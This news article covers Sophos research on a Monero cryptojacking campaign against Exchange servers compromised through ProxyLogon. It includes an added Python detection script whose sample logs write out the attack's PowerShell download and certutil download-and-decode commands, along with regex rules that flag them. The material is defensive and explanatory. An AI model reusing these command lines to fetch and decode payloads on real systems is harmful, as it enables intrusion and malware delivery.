Cryptojacking can be added to the list of threats facing any unpatched Exchange servers that remain vulnerable to the now-infamous ProxyLogon exploit chain, new research shows.
Threat actors used a compromised Exchange server to host a malicious Monero cryptominer in an "unusual attack," Sophos researchers found.
The researchers found the threat actors using Exchange servers compromised via the highly publicised exploit chain, which has been abused in a surge of attacks by advanced persistent threat (APT) groups to deploy everything from web shells to ransomware, to host Monero cryptomining malware, according to a report published online this week by SophosLabs.
“An unknown attacker has been attempting to use what’s now known as the Proxy Logon exploit to foist a malicious Monero crypto-miner onto Exchange servers, with the payload being hosted on a compromised Exchange server,” Sophos Principal Researcher Andrew Brandt wrote in the report.
Researchers were inspecting telemetry when they spotted what they considered an "unusual attack" targeting a customer's Exchange server. Sophos researchers Fraser Howard and Simon Porter were key to the discovery and analysis of the new threat, Brandt noted.
Sophos products detect the executables associated with this attack as Mal/Inject-GV and XMR-Stak Miner (PUA), the report states. The researchers also published a list of indicators of compromise on the SophosLabs GitHub page to help organisations determine whether they have been attacked in this way.
As observed by the researchers, the attack began with a PowerShell command that retrieved a file named win_r.zip from another compromised server's Outlook Web Access logon path (/owa/auth), the report explains.
On closer examination, the .zip file was not a compressed archive at all but a batch script, which in turn invoked the built-in Windows certutil.exe utility to download two further files, win_s.zip and win_d.zip, which were not archives either.
The first file is written to disk as QuickCPU.b64, a base64-encoded executable payload that certutil can decode: the tool is designed to decode base64-encoded certificates, and because it is a signed Windows binary that can both fetch URLs and decode base64, attackers routinely abuse it as a living-off-the-land downloader and decoder, the researchers observed.
The batch script then runs a further certutil command that writes the decoded executable into the same directory. Once decoded, the batch script launches the executable, which extracts the miner and its configuration from the QuickCPU.dat file, injects the miner into a system process, and then deletes the evidence that it was there, according to the report.
The executable used in the attack appears to contain a modified version of a tool publicly available on GitHub called PEx64-Injector, described on its GitHub page as able to "migrate any x64 exe to any x64 process" with "no administrator privileges required," according to the report.
Once the file runs on an infected system, it temporarily extracts the contents of QuickCPU.dat, which include an installer for the cryptominer and its configuration, to the filesystem. It then configures the miner, injects it into a running process and exits, according to the report.
"The batch file then deletes the evidence and the miner remains running in memory, injected into a process already running on the system," Brandt wrote.
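The download-and-decode chain described above leaves two things a responder can look for even after the batch file has cleaned up: process-creation records showing certutil being used to fetch and decode files from an /owa/auth path, and the dropped .b64 file itself, which decodes to a PE image rather than a certificate. The following Python is an added example written for this article, not code from Sophos or from the report; the sample events, hostname (mail.example.test) and file contents are constructed to mirror the reported chain, and the fake PE header is a stand-in for the real payload.

```python
import base64
import binascii
import re

# Constructed process-creation records (as a SIEM might hold them from Sysmon
# Event ID 1 or PowerShell logging). Only the file names from the report are
# real; the host, paths and PIDs are placeholders.
SAMPLE_EVENTS = [
    {"pid": 4120, "image": "powershell.exe",
     "cmd": 'powershell.exe -nop -w hidden -c "iwr https://mail.example.test/owa/auth/win_r.zip -OutFile C:\\Windows\\Temp\\win_r.zip"'},
    {"pid": 4188, "image": "certutil.exe",
     "cmd": "certutil.exe -urlcache -split -f https://mail.example.test/owa/auth/win_s.zip QuickCPU.b64"},
    {"pid": 4190, "image": "certutil.exe",
     "cmd": "certutil.exe -urlcache -split -f https://mail.example.test/owa/auth/win_d.zip QuickCPU.dat"},
    {"pid": 4201, "image": "certutil.exe",
     "cmd": "certutil.exe -decode QuickCPU.b64 QuickCPU.exe"},
    {"pid": 4210, "image": "certutil.exe",          # benign admin use, should not fire
     "cmd": "certutil.exe -verify -urlfetch C:\\certs\\server.cer"},
    {"pid": 4301, "image": "powershell.exe",        # benign admin use, should not fire
     "cmd": "powershell.exe Get-MailboxDatabase -Status"},
]

# Each rule targets one stage of the chain: certutil as a downloader,
# certutil as a base64 decoder, and any fetch of a file from /owa/auth/,
# a directory that should never serve zip/b64/dat/exe files.
RULES = [
    ("certutil_download", re.compile(r"certutil(\.exe)?\s.*-urlcache\b.*\s-f\b", re.I)),
    ("certutil_decode",   re.compile(r"certutil(\.exe)?\s.*-decode\b", re.I)),
    ("owa_auth_fetch",    re.compile(r"/owa/auth/[^\s'\"]+\.(zip|b64|dat|exe)\b", re.I)),
]


def scan_events(events):
    """Return (pid, rule_name) for every event whose command line matches a rule."""
    hits = []
    for ev in events:
        for name, pattern in RULES:
            if pattern.search(ev["cmd"]):
                hits.append((ev["pid"], name))
    return hits


def stages_seen(hits):
    """Set of chain stages observed; all three together is a strong signal."""
    return {name for _, name in hits}


# certutil -decode tolerates PEM-style header/footer lines and line breaks,
# so triage has to strip them the same way before base64-decoding.
PEM_LINE = re.compile(rb"^-----(BEGIN|END)[^-]*-----\s*$", re.M)


def decode_certutil_b64(data: bytes) -> bytes:
    body = PEM_LINE.sub(b"", data)
    body = b"".join(body.split())        # drop all whitespace and newlines
    return base64.b64decode(body, validate=True)


def looks_like_pe(blob: bytes) -> bool:
    """True if blob has an 'MZ' DOS header and 'PE\\0\\0' at e_lfanew (offset 0x3C)."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(blob[0x3C:0x40], "little")
    return blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def triage_dropped_file(data: bytes) -> str:
    """Classify a suspected QuickCPU.b64-style file: not base64, base64 PE, or other."""
    try:
        decoded = decode_certutil_b64(data)
    except (binascii.Error, ValueError):
        return "not-base64"
    return "base64-pe" if looks_like_pe(decoded) else "base64-other"


def make_fake_pe() -> bytes:
    """Constructed stand-in for the payload: MZ stub whose e_lfanew points at 'PE\\0\\0'."""
    hdr = bytearray(b"MZ" + b"\0" * 0x3A)         # pad to offset 0x3C
    hdr += (0x40).to_bytes(4, "little")           # e_lfanew = 0x40
    hdr += b"PE\0\0" + b"\0" * 20                 # PE signature at 0x40
    return bytes(hdr)


def make_certutil_b64(blob: bytes) -> bytes:
    """Wrap bytes the way certutil -encode does: PEM header, 64-char lines, CRLF."""
    b64 = base64.b64encode(blob)
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return (b"-----BEGIN CERTIFICATE-----\r\n" + b"\r\n".join(lines)
            + b"\r\n-----END CERTIFICATE-----\r\n")


if __name__ == "__main__":
    for pid, rule in scan_events(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
    print("stages:", sorted(stages_seen(scan_events(SAMPLE_EVENTS))))
    print("dropped file:", triage_dropped_file(make_certutil_b64(make_fake_pe())))
```

The two benign certutil and PowerShell records are there deliberately: certutil -urlfetch during certificate verification and ordinary Exchange cmdlets are common on a mail server, and the rules are written so that only the urlcache download, the decode step and the /owa/auth fetch fire.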
Researchers observed the miner's wallet start receiving funds on March 9, when Microsoft was also releasing Exchange updates to patch the flaws.
Though the attacker lost several servers after that date and the miner's output dropped, servers compromised later more than made up for the early losses, according to the report.
The ProxyLogon saga began for Microsoft in early March, when the company disclosed that it had spotted multiple zero-day exploits being used in the wild against on-premises versions of Microsoft Exchange Server. The exploit chain comprises four flaws: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.
Chained together, the flaws yield pre-authentication remote code execution (RCE): CVE-2021-26855 is a server-side request forgery that lets an unauthenticated attacker impersonate the Exchange server itself, and the post-authentication bugs that follow it allow an arbitrary file write, so attackers can take over servers without knowing any valid account credentials. That gave them access to email communications and the opportunity to drop a web shell for further exploitation within the environment.
Microsoft rushed out an out-of-band update soon after to patch the flaws in the ProxyLogon chain. But although the company said later that month that 92% of affected machines had already been patched, much damage had already been done, and unpatched systems that remain vulnerable almost certainly still exist.